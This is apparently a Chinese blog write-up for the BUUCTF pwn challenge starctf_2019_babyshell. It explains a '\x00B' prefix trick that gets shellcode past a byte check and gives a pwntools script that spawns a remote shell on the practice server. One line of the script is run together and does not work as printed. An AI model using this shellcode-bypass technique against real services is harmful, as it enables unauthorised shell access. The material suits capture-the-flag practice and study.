[BUUCTF-pwn]——starctf_2019_babyshell
[BUUCTF-pwn]——starctf_2019_babyshell
学到了, 又学到了FMYY师傅太强了
只需要通过\x00绕过检查, 同时执行我们输入的shellcode就好
**\x00B后面加上一个字符, 对应一个汇编语句。**所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查
当然其他汇编肯定也可以大家可以自己找找哈,看到别的师傅好像\x00J\x00也是可以滴
from pwn import *
context.arch = "amd64"
p = remote("node3.buuoj.cn",27993)
#p = process("./starctf_2019_babyshell")
payload = '\x00B3' + asm(shellcraft.sh())p.sendline(payload)
p.interactive()
[BUUCTF-pwn]——starctf_2019_babyshell相关推荐
- BUUCTF(pwn)starctf_2019_babyshell
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句. 所以我们 ...
- BUUCTF Pwn warmup
BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF PWN rip1 WP
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...
- buuctf pwn bjdctf_2020_babyrop
buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...
- 持续更新 BUUCTF——PWN(三)
文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...
- 持续更新 BUUCTF——PWN(二)
文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...
- Buuctf(pwn) picoctf_2018_rop chain 栈溢出
32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...
- BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc
思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...
- Buuctf(pwn) jarvisoj_tell_me_something 栈溢出
64位程序,开启了NX保护 400620 from pwn import *r=remote('node4.buuoj.cn',29273)flag_addr=0x400620payload='a'* ...
最新文章
- 第80节:Java中的MVC设计模式
- LumaQQ.NET操作指令制作(3)
- 缴纳满15年养老保险退休金每月1200块钱左右,值得缴吗?
- 线程同步,线程不同步_同步多线程集成测试
- 怎么把html转换成jpg6,html转为图片(六):xhtmlrenderer
- AngularJS.js: temple
- 交换机分布缓存_网络核心交换机和普通交换机有什么区别?
- 浅谈格斗游戏的精髓——方块的战争
- FreeRTOS的HOOK,以及(23)FreeRTOS 空闲任务分析
- Iometer存储测试工具参数说明- 2 Access Specifications
- mysql概念模型中的3种基本联系_数据库建模三步骤:概念模型
- PostgreSQL-Docker创建PostgreSQL数据库并导入矢量数据
- ionic3 教程(一)安装和配置 1
- 论文笔记:MPRNet: Multi-Stage Progressive Image Restoration
- 关于BAPI_CONTRACT_CREATEFROMDATA涉及使用价格
- 初识:链路聚合的小知识
- python开源ip代理池_[技术]基于python实现的短效代理ip池程序
- 如何创建自定义DevExpress报表控件,看完你就懂了
- 爱了,爱了,一款拯救直男的开源神器!
- 整数划分的递归实现算法c语言,整数划分算法原理与实现